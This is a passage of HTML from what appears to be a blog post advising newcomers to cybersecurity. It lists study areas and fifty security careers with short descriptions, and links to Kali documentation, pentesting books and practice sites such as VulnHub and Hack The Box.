Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>SCADA Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Reverse Engineering</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Malware Analysis</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" 
style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Forensics</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Security Research</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hardware Security</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Exploitation</span></span></p><p style="background-attachment: 
initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hardware Hacking</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>IoT Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>RedTeaming -> Offensive</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: 
initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>BlueTeam -> Defensive</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Of course, you can split your focus and study more than 1 topic at the same time.<br /><br />If you are still lost, here are some careers you can look into and decide which one is more suitable for you:<br /> <br /></span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">1. Application Security Administrator – Keep software/apps safe and secure.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">2. 
Artificial Intelligence Security Specialist – Use AI to combat cybercrime.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">3. Automotive Security Engineer – Protect cars from cyber intrusions.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">4. Blockchain Developer / Engineer – Code the future of secure transactions.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">5. Blue Team Member – Design defensive measures / harden operating systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">6. Bug Bounty Hunter – Freelance hackers find defects and exploits in code.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">7. Cybersecurity Scrum Master – Watch over and protect all data.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">8. 
Chief Information Security Officer (CISO) – Head honcho of cybersecurity.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">9. Chief Security Officer (CSO) – Head up all physical/info/cyber security.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">10. Cloud Security Architect – Secure apps and data in the cloud.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">11. Counterespionage analyst – Thwart cyber spies from hostile nation states.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">12. Cryptanalyst – Decipher coded messages without a cryptographic key.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">13. Cryptographer – Develop systems to encrypt sensitive information.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">14. 
Cyber Insurance Policy Specialist – Consult on cyber risk and liability protection.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">15. Cyber Intelligence Specialist – Analyze cyber threats and defend against them.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">16. Cyber Operations Specialist – Conduct offensive cyberspace operations.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">17. Cybercrime Investigator – Solve crimes conducted in cyberspace.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">18. Cybersecurity Hardware Engineer – Develop security for computer hardware.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">19. Cybersecurity Lawyer – Attorney focused on info/cyber security and cybercrime.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">20. 
Cybersecurity Software Developer / Engineer – Bake security into applications.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">21. Data Privacy Officer – Ensure legal compliance related to data protection.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">22. Data Recovery Specialist – Recover hacked data from digital devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">23. Data Security Analyst – Protect information on computers and networks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">24. Digital Forensics Analyst – Examine data containing evidence of cybercrimes.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">25. Disaster Recovery Specialist – Plan for and respond to data and system catastrophes.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">26. 
Ethical / White Hat Hacker – Perform lawful security testing and evaluation.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">27. Governance Compliance & Risk (GRC) Manager – Oversee risk management.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">28. IIoT (Industrial Internet of Things) Security Specialist – Protect industrial control systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">29. Incident Responder – First response to cyber intrusions and data breaches.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">30. Information Assurance Analyst – Identify risks to information systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">31. Information Security Analyst – Plan and carry out infosecurity measures.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">32. 
Information Security Manager / Director – Oversee an IT security team(s).</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">33. Intrusion Detection Analyst – Use security tools to find targeted attacks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">34. IoT (Internet of Things) Security Specialist – Protect network connected devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">35. IT Security Architect – Implement network and computer security.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">36. Malware Analyst – Detect and remediate malicious software.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">37. Mobile Security Engineer – Implement security for mobile phones and devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">38. 
Network Security Administrator – Secure networks from internal and external threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">39. Penetration Tester (Pen-Tester) – Perform authorized and simulated cyberattacks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">40. PKI (Public Key Infrastructure) Analyst – Manage the secure transfer of digital information.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">41. Red Team Member – Participate in real-world cyberattack simulations.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">42. SCADA (Supervisory control and data acquisition) Security Analyst – Secure critical infrastructures.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">43. 
Security Auditor – Conduct audits on an organization’s information systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">44. Security Awareness Training Specialist – Train employees on cyber threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">45. Security Operations Center (SOC) Analyst – Coordinate and report on cyber incidents.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">46. Security Operations Center (SOC) Manager – Oversee all SOC personnel.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">47. Source Code Auditor – Analyze software code to find bugs, defects, and breaches.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">48. Threat Hunter – Search networks to detect and isolate advanced threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">49. 
Virus Technician – Detect and remediate computer viruses and malware.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">50. Vulnerability Assessor – Find exploits in systems and applications.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />In these links, you can find more detailed information regarding each career: </p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6b6beaf55a366a55/Poster_Coolest-Careers_v0322.pdf<br /><br />https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you are 
considering using Kali to start your studies, you should visit the link http://docs.kali.org.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>This link has a lot of Kali documentation that can help you before you go to the #kali-Linux channel on Freenode and ask an obvious question. Also, you can use forums.kali.org. Additionally, as Kali is Debian-based, it is good to check the Debian Linux documentation if you are unfamiliar with this distro.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 
0pt; margin-top: 0pt;"><span>Some helpful links to start your pentest journey:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Books:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.hackingexposed.com/ - Very nice book series that covers a lot of different topics.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: 
initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>This is another very nice book series that covers many topics, like Mobile, Android, Cars, and others, not only Web Applications; search for it.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; 
background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/s/ref=nb_sb_noss_1?url=search-alias%3Dstripbooks&field-keywords=hacker%27s+handbook&rh=n%3A283155%2Ck%3Ahacker%27s+handbook</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/SQL-Injection-Attacks-Defense-Second/dp/1597499633/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: 
initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Red Teaming: </span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.amazon.de/Red-Team-Succeed-Thinking-Enemy/dp/0465048943</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.amazon.de/-/en/Joe-Vest/dp/B083XVG633/ref=pd_lpo_4?pd_rd_i=B083XVG633&psc=1</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; 
background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, you can google "Pentest Kali Linux". There are a lot of related books; just choose one and try.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Links:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; 
background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>One more link in the same style as this post:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.vulnhub.com -> A lot of vulnerable machines to play with.</span></span></p><p 
style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.securitytube.com -> A lot of security videos and tutorials.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.cybrary.it -> More security videos</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://pentesterlab.com -> Various pentest exercises</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; 
background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://hackthebox.eu -> Various pentest exercises</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikipedia.org/wiki/Hacking:_The_Art_of_Exploitation -> Low Level exploitation</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.owasp.org</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; 
